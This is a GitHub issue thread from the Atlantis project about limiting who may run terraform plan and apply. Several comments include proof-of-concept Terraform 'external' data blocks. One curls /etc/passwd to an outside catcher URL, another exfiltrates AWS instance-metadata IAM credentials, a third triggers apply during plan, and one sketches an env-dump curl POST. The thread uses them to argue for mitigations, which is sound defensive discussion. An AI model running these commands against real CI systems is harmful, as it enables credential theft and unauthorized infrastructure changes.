runatlantis / atlantis

Terraform Pull Request Automation
https://www.runatlantis.io

Restrict Plan or Apply to Github Teams or Github Users #308

Closed osterman closed 2 years ago

osterman commented 6 years ago

what

why

proposal

add the following flags.

Allow an explicit set of users.

--gh-user-whitelist=osterman,goruha,aknysh

Allow teams in an organization

--gh-team-whitelist=ops
--gh-org-whitelist=cloudposse

The arg convention piggybacks on the existing --repo-whitelist convention and on the fact that all GitHub features are prefixed with --gh-*.


An alternative interface could be based on CODEOWNERS, but I think that will be more work to implement.

jordan-evans commented 6 years ago

Could this also be extended into the other repository providers (e.g. GitLab)?

osterman commented 6 years ago

@darrylb-github any thoughts on this one?

darrylb-github commented 6 years ago

@darrylb-github any thoughts on this one?

@osterman Yeah, we're hitting the same problems. We initially tried protected branches plus requiring approval in atlantis, but that way you would have to protect all branches, which doesn't work well.

Your proposal would solve this for us as well via the --gh-team-whitelist option. I can't currently think of a better way to solve this.

I think it's beyond my atlantis/go experience to attempt to implement this myself, but it does feel like a deal breaker at the moment unless we can find another workaround 🤔

darrylb-github commented 6 years ago

Note I don't think it's necessary to restrict plans though; it's the apply I'm worried about.

osterman commented 6 years ago

@aknysh on my team started working on this today. Will keep you posted.

In our case, plans also need to be restricted since the external data provider runs on every plan and can run any command.

lkysow commented 6 years ago

I think the best way to implement this is to use a server-side Atlantis.yaml config (#47). I don't want to go the direction of server flags because it's not scalable. Inevitably someone is going to want a specific config for a specific Terraform repo/directory/workspace which they won't be able to accomplish with a global flag.

Unfortunately the server-side config isn't complete but I think this will have to wait for that.

majormoses commented 6 years ago

Can't this already be achieved with GitHub CODEOWNERS?

majormoses commented 6 years ago

Note I don't think its necessary to restrict plans though; it's the apply I'm worried about.

I agree that the scary thing from a security stance is the ability to run local and remote exec blocks, but those are not run during a plan.

majormoses commented 6 years ago

I suppose longer term, supporting commands like state (mv|rm) comes to mind as well, once they are added to atlantis.

osterman commented 6 years ago

We've implemented this here: https://github.com/cloudposse/atlantis/pull/7

osterman commented 6 years ago

We're taking atlantis to the extreme. My goal is to have it on public repos so we can test modules. terraform plan is dangerous. As long as you can access the external data provider, you can do anything you want. The external data provider necessarily runs on plan and will execute any command on the machine.

Best policy is to know exactly who can run apply and plan.

osterman commented 6 years ago

Unfortunately the server-side config isn't complete but I think this will have to wait for that.

@lkysow, I understand your position. As an architect of many systems, I struggle with it daily.

I guess from where I stand this is a hard stop, don't-even-consider-using-atlantis kind of problem that anyone I talk to shares. They love the idea of atlantis, but when I say "oh, and anyone with access to the repo can trigger an apply", it's a non-starter. Sometimes "what gets you here, doesn't get you there". I understand the desire to put this into the server-side config. But it sounds like the scope of that is much greater. Adding a stop-gap measure to address a major liability from a security perspective is warranted IMO, even if it is not the ideal solution longer term.

majormoses commented 6 years ago

@osterman when you say if you can plan you can do anything you want, can you expand? Local/remote exec blocks are not evaluated during a plan, so easy exfiltration and code execution can be stopped by requiring code review, as long as you are using the --require-approval serverside option and CODEOWNERS. Since GitHub evaluates CODEOWNERS based on your default branch (typically master) rather than what's in the branch/fork you are proposing, an attacker with repo access would need two pull requests to pull this off, and would require write protection to be enabled as well as either an approval or privileges to bypass any branch protections. I can see the danger that they could write their own terraform provider that does pretty much anything they want. In the context of allowing it only for internal projects I think that would be sufficient, but with it being external I can see why that would be a major concern.

but when I say "oh, and anyone with access to the repo can trigger an apply", it's a non-starter.

Agreed if that was the case, but like I said, with a CLI arg and CODEOWNERS you can gate the apply even if not the plan. There is still danger for your use case, but at least the barrier to entry is much higher.

I understand the desire to put this into the server-side config.

If it's meant to be a meaningful protection it must be serverside (whether it's a config option or CLI args), as otherwise an attacker can just change the permissions themselves.

I do see needing more fine grained access controls in the future to safely support public projects as well as when other commands are implemented such as state, destroy, etc.

lkysow commented 6 years ago

oh, and anyone with access to the repo can trigger an apply

Can you explain why you think this is the case?

With --require-approval you need to be able to approve a pull request prior to apply. The list of approvers can be gated in all VCS providers.

Or do you mean that once a PR is approved, then anyone can apply? Which is true.

osterman commented 6 years ago

@osterman when you say if you can plan you can do anything you want can you expand? Local/remote exec blocks are not evaluated during a plan

Here's an example of using the external data provider to exfiltrate data during a plan.

Providers are not like the local or remote provisioners. They can hook into any part of the terraform lifecycle. In this case, the external data provider hooks into the plan cycle so that it can source data from external commands (e.g. a python script).

Here's an example of exfiltrating the first line of the /etc/passwd file (useless these days), to an external site http://exfiltrate.requestcatcher.com/test

Running terraform plan on the following will result in this command getting executed. It runs in the same context as an apply (e.g. EC2 instance profiles or ECS task roles), so presumably with all the same AWS credentials, etc. It could be much worse.

# https://www.terraform.io/docs/providers/external/data_source.html
data "external" "example" {
  program = ["/bin/bash", "-c", "(head -1 /etc/passwd | curl -XPOST -d@- http://exfiltrate.requestcatcher.com/test >/dev/null); echo {}" ]
  query = { }
}

@majormoses CODEOWNERS you can gate the apply even if not the plan, there is still danger for your use case but at least the barrier of entry is much higher.

This may be true on GitLab or other VCS, but not on GitHub. Per the atlantis documentation anyone can approve a pull request. As far as I understand, the CODEOWNER only gates merging.

@lkysow With --require-approval you need to be able to approve a pull request prior to apply. The list of approvers can be gated in all VCS providers.

Maybe there's some extra toggle somewhere in GitHub that further restricts approvals across the board. I won't rule it out.

This also seems to be the case per the CODEOWNERS documentation.

they also can optionally require approval from a code owner before the author can merge a pull request in the repository

But the fact remains, a terraform plan can today execute any command.

If it's meant to be a meaningful protection it must be serverside

Sorry, that was my own ambiguity. I was referring to args passed to atlantis server.

@aknysh on our team has implemented this here: https://github.com/cloudposse/atlantis/pull/7

Since it didn't seem like it was going to be accepted (per the earlier discussion), we didn't open a PR against runatlantis/atlantis

osterman commented 6 years ago

Now, what would be truly nasty is to curl http://169.254.169.254/latest/meta-data/iam/security-credentials/... and exfiltrate those STS credentials, and thus have carte blanche remote access to AWS with whatever privileges are given to atlantis.
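
For illustration, a sketch along the same lines as the earlier example (the role name and destination URL are placeholders):

# Hypothetical illustration: grabs the instance role's temporary credentials
# during plan and posts them to an attacker-controlled endpoint.
# "atlantis-role" and the requestcatcher URL are placeholders.
data "external" "steal_creds" {
  program = ["/bin/bash", "-c", "(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/atlantis-role | curl -s -XPOST -d@- http://exfiltrate.requestcatcher.com/creds >/dev/null); echo {}"]
  query = {}
}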

majormoses commented 6 years ago

This may be true on GitLab or other VCS, but not on GitHub. Per the atlantis documentation anyone can approve a pull request. As far as I understand, the CODEOWNER only gates merging.

So from what I remember (I could be wrong or not remembering correctly), if you set branch protection to require CODEOWNERS review, it affects the mergeable state, and atlantis uses that to determine if you can apply, so an approval from someone who has write access to the repo but is not a CODEOWNER does not count. I can try to set up a test to validate this.
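
For reference, here is roughly what that setup looks like; the org and team names are placeholders:

# .github/CODEOWNERS (team name is a placeholder)
# With "Require review from Code Owners" enabled in branch protection,
# any PR touching these files stays unmergeable until the team approves.
*.tf        @example-org/ops
*.tfvars    @example-org/ops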

osterman commented 6 years ago

@majormoses that would be cool - would love confirmation if that's how it works. If so, the atlantis documentation may be misleading since the red warning dialog seems to say something different. However, since I could run the following in a terraform plan to trigger a terraform apply, it makes no effective difference to a bad actor. We need a plan_requirements section as well.

data "external" "example" {
  program = ["/bin/bash", "-c", "terraform apply>/dev/null 2>&1); echo {}" ]
  query = { }
}
majormoses commented 6 years ago

But the fact remains, a terraform plan can today execute any command.

It wouldn't be very useful if it couldn't, and I agree on the need to restrict that further, especially when implementing additional commands (state, destroy, etc.). I'm just trying to figure out if the current protections are meaningful enough for internal projects, where it's more about preventing naive users from doing bad things than about malicious actors.

osterman commented 6 years ago

I have direct knowledge of a company that had two developer accounts hacked on the same weekend a few months back. Both had mandatory MFA enabled on their GitHub and Google email accounts. In their case, a social engineering attack allowed SIM jacking. A whitelist is not perfect. MFA would be better. But I'm just talking baby steps right now. Reducing the attack surface by restricting the number of engineers that can plan/apply changes (at least to production) makes me feel better.

majormoses commented 6 years ago

I just tested, and it looks like atlantis does not look at the mergeability state to determine if the apply can be run. @lkysow is that a bug or intended? I might be remembering wrong, but I seem to recall us talking about this a while ago.

majormoses commented 6 years ago

Found it, it was something being discussed but not yet implemented: https://github.com/runatlantis/atlantis/issues/43. @osterman if that was implemented, would it solve most of your concerns? While it still relies on trust in GitHub, and a compromised account with enough privileges could certainly disable protections, I think this would be a huge step in the right direction and should not be too hard to implement. One of the benefits of this approach is that it works with GitHub and GitLab (not sure if Bitbucket or other VCS providers have similar concepts), so it would help the most people for the least amount of effort.

osterman commented 6 years ago

Btw, the GitHub Universe conference is happening this week. Heard through the grapevine that better RBAC is coming (fingers crossed!). That said, the same source said GitHub was not coming out with CI/CD, and we know how that turned out. =P

@majormoses Re: #43, yes & no. I agree 100% with the intent of #43. Mergeability should be a criterion for apply when we say approved, though perhaps as an additional requirement. However, it's not configurable enough.

apply_requirements: [approved, mergeable]

If you take a look at our proposed solution in this PR: https://github.com/cloudposse/atlantis/pull/7 it scales somewhat better in terms of flexibility.

atlantis server --gh-team-whitelist=dev:plan,ops:apply,devops:*

This says that a team called dev can run plan, and the team called ops can run apply and a team called devops can do anything. Now, if we introduced a new verb like destroy, that could easily be tied to another team.
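
As a rough sketch only (hypothetical; not the cloudposse fork's actual implementation), the flag value could be parsed into a team-to-commands map and checked before running a command:

package main

import (
    "fmt"
    "strings"
)

// parseTeamWhitelist turns "dev:plan,ops:apply,devops:*" into a map of team -> allowed commands.
func parseTeamWhitelist(flag string) map[string][]string {
    allowed := make(map[string][]string)
    for _, pair := range strings.Split(flag, ",") {
        parts := strings.SplitN(pair, ":", 2)
        if len(parts) != 2 {
            continue // ignore malformed entries
        }
        allowed[parts[0]] = append(allowed[parts[0]], parts[1])
    }
    return allowed
}

// isAllowed reports whether any of the user's teams may run cmd ("*" permits every command).
func isAllowed(allowed map[string][]string, userTeams []string, cmd string) bool {
    for _, team := range userTeams {
        for _, c := range allowed[team] {
            if c == "*" || c == cmd {
                return true
            }
        }
    }
    return false
}

func main() {
    allowed := parseTeamWhitelist("dev:plan,ops:apply,devops:*")
    fmt.Println(isAllowed(allowed, []string{"dev"}, "apply"))    // false
    fmt.Println(isAllowed(allowed, []string{"devops"}, "apply")) // true
}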

Granted, if a user wants to do full-on RBAC per workflow/step/etc, it's a very slippery slope.

I admit that this is kind of a GitHub-centric approach. We needed something before 10/25 =)

majormoses commented 6 years ago

@osterman makes sense. I agree that more granular is better, and I hope GitHub RBAC is going to improve, although it will probably mean tons of refactoring again at my org.

There are several things to consider with the proposed approach. At my current organization we have 85 teams (and that might actually go up quite a bit as we are breaking up some of our larger teams), so providing even 15-20 teams via a CLI arg seems like not the best solution, though with a config file that might be OK. How would we handle sub/child teams? The more you specify on the command line, the more is exposed in the process table, which is accessible to any user and could be used to plan the next attack. I generally recommend providing anything sensitive (secrets, team names, repo names, permissions, etc.) via a config file, an ENV var, or pulled directly from a secrets manager (such as hashicorp vault, aws ssm, etc.).
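
For what it's worth, Atlantis already accepts any of its flags as ATLANTIS_* environment variables, which keeps the value out of the world-readable argument list; a team whitelist flag could presumably follow the same convention (that variable is hypothetical, since the flag only exists in the fork):

# Real convention: --repo-whitelist can be set via ATLANTIS_REPO_WHITELIST.
export ATLANTIS_REPO_WHITELIST="github.com/cloudposse/*"
# Hypothetical: assumes the fork's --gh-team-whitelist maps the same way.
export ATLANTIS_GH_TEAM_WHITELIST="dev:plan,ops:apply,devops:*"
atlantis server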

Granted, if a user wants to do full-on RBAC per workflow/step/etc, it's a very slippery slope.

I don't think atlantis should be in the business of providing real RBAC for this very reason. In its current state I'd say it's best to let some external process push status checks to your VCS provider and use the mergeable status it gives to determine whether an action can be performed or not. At some point it might make more sense to try to flesh out more of a full RBAC solution, but I think atlantis should provide "good enough" security (highly subjective what that means) and focus on other core improvements. I do agree that in the context of adding new commands outside plan/apply we need something more robust.

Anyways that's just my $0.02

lkysow commented 6 years ago

Wow, a lot to read here and I agree with both of you. I'm going to write up a bigger response with some plans to move forward so don't think I'm ignoring this, just crafting it!

kipkoan commented 6 years ago

oh, and anyone with access to the repo can trigger an apply

Can you explain why you think this is the case?

With --require-approval you need to be able to approve a pull request prior to apply. The list of approvers can be gated in all VCS providers.

I don't know of a way to do this with Bitbucket (Server / Data Center). You can have a list of required approvers for a merge, but anyone can be added as a reviewer and then approve it.

-- Kip

osterman commented 6 years ago

For those interested, we have a prototype of --gh-repo-whitelist available here (with binary releases): https://github.com/cloudposse/atlantis/releases

See pulls: https://github.com/cloudposse/atlantis/pulls

It also includes a number of other experimental features like --wake-word and --repo-config

estahn commented 5 years ago

@majormoses @lkysow Would you be able to explain how CODEOWNERS help? It appears to be ignored by Atlantis.

lkysow commented 5 years ago

Right now it doesn't.

When #43 is fixed (#385 was just opened to fix it), then you can make mergeability an apply_requirement and then make approval by CODEOWNERS required for a pull request to be mergeable.

osterman commented 5 years ago

I'm excited about #385 ! It's a step in the right direction.

Not to beat a dead horse, just want to emphasize that without something like plan_requirements, we're still very exposed since any command can be executed as part of plan. I don't want companies having a false sense of security. Full context of previous discussion available here.

majormoses commented 5 years ago

@osterman I feel you, I don't think you are beating a dead horse. I agree we need something more, but it's a good start and leaves room for improvement. Would using the mergeable field to gate plans via a plan_requirements config option satisfy your needs? I'm still of the opinion that we should have the VCS providers (through mechanisms such as CODEOWNERS) keep track of lists of people as chances are they are already being tracked and updated. Trying to reduce the duplication as much as possible.

estahn commented 5 years ago

@osterman I wonder if there could be some conditions around when to execute plan automatically. Or do you consider all resources (not just data, local, ...) as dangerous?

osterman commented 5 years ago

thanks @majormoses !

Would using the mergeable field to gate plans via a plan_requirements config option satisfy your needs?

Let's try to codify our "cloudposse" requirements:

  1. We would like to allow anyone (contributor, public, etc) to open a PR (but not anyone to run plan or apply)
  2. We would like to allow a specific list of users to run plan (it could be CODEOWNERS, but could also be opened up to a larger trusted group)
  3. With #385 and CODEOWNERS the need to restrict who can run apply is sufficiently addressed

So as a stop-gap measure, I think plan_requirements would actually work. It just puts more onus on CODEOWNERS to also run plan.
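
For concreteness, a sketch of what that could look like in a repo-level atlantis.yaml; plan_requirements is hypothetical here, only apply_requirements exists today:

# Sketch only: plan_requirements is a proposed key, not an existing one.
version: 2
projects:
- dir: .
  plan_requirements: [mergeable]
  apply_requirements: [approved, mergeable]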

I'm still of the opinion that we should have the VCS providers (through mechanisms such as CODEOWNERS) keep track of lists of people as chances are they are already being tracked and updated.

Yes, that would be my top choice as well.

osterman commented 5 years ago

Another idea would be to require a certain number of CODEOWNERS to approve a PR for apply to work (configurable). And then another number of approvals to allow plan to work. This then implements a sort of two-man rule. Haven't thought this through too much; just trying to see how we could stick within the confines of the CODEOWNERS and approvals framework.

e.g.

example use-case

osterman commented 5 years ago

I wonder if there could be some conditions around when to execute plan automatically. Or do you consider all resources (not just data, local, ...) as dangerous?

@estahn I would prefer not to go down the path of evaluating resource safety, because we use atlantis for more than just terraform. Also, with external commands, I don't think there's any practical way to achieve this.

majormoses commented 5 years ago

Another idea would be to require a certain number of CODEOWNERS to approve a PR for apply.

You can actually do that via branch protections, by setting the required number of approving reviews.

That does not address different plan vs apply requirements, but you could satisfy a two-man rule via means already (or shortly) available.

majormoses commented 5 years ago

We would like to allow anyone (contributor, public, etc) to open a PR (but not anyone to run plan or apply)

That sounds pretty doable with the current framework

We would like to allow a specific list of users to run plan (it could be CODEOWNERS, but could also be opened up to a larger trusted group)

Sounds like adding plan_requirements and mergeable satisfies the first portion. For the second portion, what would you envision? Would it be anyone with write access to the repo (we probably need admin permissions on the repo to determine that), or a list?

With #385 and CODEOWNERS the need to restrict who can run apply is sufficiently addressed

:+1:

justinhauer commented 5 years ago

What is the status of this thread? My company is seriously looking at implementing Atlantis and knowing the outcome of this discussion seems pretty important. @majormoses @lkysow @osterman

majormoses commented 5 years ago

The "mergeable" option has been released, this allows you to disable auto planning and relying on branch protections (such as CODEOWNERS with multiple reviews) to gate running a plan. While it does not address the specific request and I agree it still needs to be added but I think this should address most of the concerns around this in its current state. I think this will be an important prerequisite to introducing new features that allow state manipulation (import, rm, mv, etc). I won't speak for @lkysow or @osterman but I don't see this as critical to implement right now without looking at adding additional state commands beyond plan and apply.

@justinhauer do those address your concerns? If not I would like to understand your use case and flow.

justinhauer commented 5 years ago

@majormoses I just want to be crystal clear on your comments here (I think this addresses my needs). 1) If I disable auto planning, I can require review/approval to run atlantis plan. 2) I can require a member of CODEOWNERS to be one of the reviewers at each review/approval stage? 3) The same would apply to atlantis apply, needing a member of CODEOWNERS to approve?

Or did I misinterpret 2 and 3, and I can't restrict who can approve, I can just set the review to multiple persons?

majormoses commented 5 years ago

Actually, sorry, I misspoke; it's been a while, and keeping track of the various conversations, issues, pull requests, etc. in my head has been difficult. I think the next step is introducing a plan_requirements similar to apply_requirements and then using the mergeable option to gate 1. You can currently fulfill 2 and 3 via CODEOWNERS, branch protections, and apply_requirements.

I will say that I am pretty comfortable with my use case for my org at the moment, because we do not have any public repos that we hook up to atlantis, and at the moment we are only using it for github management itself. An attacker would need to compromise a GitHub account (which, as Erik pointed out, is certainly doable) and know enough about the ways that external data sources can be abused in a plan to circumvent the current protections. This is obviously easier on a public project, since anyone can intrinsically run a plan without compromising any accounts.

lkysow commented 5 years ago

This can be accomplished via a custom server-side workflow now:

workflows:
  custom:
    plan:
      steps:
      - run: if [ "$USERNAME" != "username" ]; then exit 1; fi
      - init
      - plan

ericnorris commented 5 years ago

I've been doing a little bit of research into Atlantis recently and came upon this thread - for what it's worth, I believe running Atlantis with terraform plugins pre-installed and initing with -get-plugins=false could mitigate the issues raised with plan.

By pre-installing plugins, administrators could remove the ability to use the external provider, which is likely not necessary for most installations. There is some info here. From what I'm reading it's possible to use Atlantis' custom workflows to add these additional parameters.
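
A sketch of that wiring as a custom workflow; the plugin directory path is an assumption, and the plugins would have to be pre-installed there on the Atlantis server:

workflows:
  preinstalled-only:
    plan:
      steps:
      - init:
          extra_args: ["-get-plugins=false", "-plugin-dir=/usr/local/share/terraform/plugins"]
      - plan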

majormoses commented 5 years ago

@ericnorris hmm I am not sure that would help as you could still leverage something that the system would have available. See the following comments:

These examples, I think, clearly illustrate the issue; essentially it highlights the danger of any CI system. It allows arbitrary code injection; if it did not, it would not be very flexible. An attacker essentially needs nothing more than to, say, dump the env vars (essentially env | curl -XPOST some_server -d @-), cat a tfvars file, etc., and then exfiltrate the data in some way. Sending a POST via curl is probably one of the less detectable methods, but they could simply add it as an output and get the data via the VCS provider comment on the PR. The fact is, whatever is on the system for legitimate users is available for abuse as well. On most systems that will minimally be some form of shell, as well as some additional scripting languages installed by the OS or admin (python, perl, ruby, etc.). While I think -get-plugins=false does solve some security concerns, it only addresses part of the concerns here. I am all for layering protections, but I don't want to give a false sense that this would fully address the problems outlined here.

ericnorris commented 5 years ago

@majormoses, unless I'm mistaken, all of those examples use the external provider, no? It is not a built-in provider, and is downloaded automatically from here. If you don't install that plugin, and limit terraform to only using pre-installed plugins, you cannot exfiltrate data during plan using external.

I understand that there may be other ways (e.g. local-exec provisioners) but I believe you will be safe during the plan stage if you only use providers that do not provide arbitrary code execution during the plan stage.

majormoses commented 5 years ago

@ericnorris you are correct (as long as client-side config is disabled); I thought it was a default included provider. I suppose if someone is using an old enough version of terraform where the plugins were embedded, that would be an issue. That being said, it's not something we can control, and they should be encouraged to upgrade anyway. There are some cases where an external data source would be required; I suppose one could add a custom workflow to make it available for that specific case and default to a plugin directory otherwise. That being said, if it's installed on the system and you allow client (repo-side) config, all bets are off. If you enable client-side config, they can simply include it in the repo (as a local path) and modify the workflow to use it, bypassing all the administrative protections.

Given this, I think it makes sense, as it minimally solves the bulk of the concerns if not their entirety. @osterman I think we should still implement more controls around the different atlantis commands (which I see as a blocker to implementing additional state modification commands such as state rm, state mv, import, etc.), but are there any other holes I am not seeing if we change the init command to not download plugins? This at least forces the administrator into intentionally allowing remote code execution, so I think it's minimally a good step in the right direction.

One question I have is: should this be exposed as a first-class config property, or should we simply rely on server-side custom workflows and document how to accomplish that? I assume if we expose it we should default to the existing behavior so as to keep backwards compatibility.

svenwb commented 5 years ago

This can be accomplished via a custom server-side workflow now:

workflows:
  custom:
    plan:
      steps:
      - run: if [ "$USERNAME" != "username" ]; then exit 1; fi
      - init
      - plan

This solution works for us as well. I would just add that having the GitHub teams the user is assigned to available as a variable would make this more flexible and easier to maintain.
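
In the meantime, a run step could look up team membership itself, e.g. against the GitHub API. A sketch, assuming a GITHUB_TOKEN with read:org scope is exported into the Atlantis environment (Atlantis does not provide one by default), with example-org/ops as placeholder names:

# Fail the plan unless $USERNAME is an active member of the ops team.
workflows:
  team-gated:
    plan:
      steps:
      - run: >
          curl -sf -H "Authorization: token $GITHUB_TOKEN"
          "https://api.github.com/orgs/example-org/teams/ops/memberships/$USERNAME"
          | grep -q '"state": "active"' || exit 1
      - init
      - plan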

red8888 commented 5 years ago

@svenwb does this work with bitbucket too? will $USERNAME have bitbucket username?

lkysow commented 5 years ago

@svenwb does this work with bitbucket too? will $USERNAME have bitbucket username?

Yes it will.

red8888 commented 5 years ago

Amazing! So if I wanted to run apply and destroy with the default behavior and just add a check for an allowed list of users, I would just have to do this, right?

apply:
  steps:
    - run: echo 'Checking Bitbucket user is allowed to run atlantis apply'
    - run: if [ "$USERNAME" != "username" ]; then exit 1; fi
    - init
    - apply
destroy:
  steps:
    - run: echo 'Checking Bitbucket user is allowed to run atlantis destroy'
    - run: if [ "$USERNAME" != "username" ]; then exit 1; fi
    - init
    - apply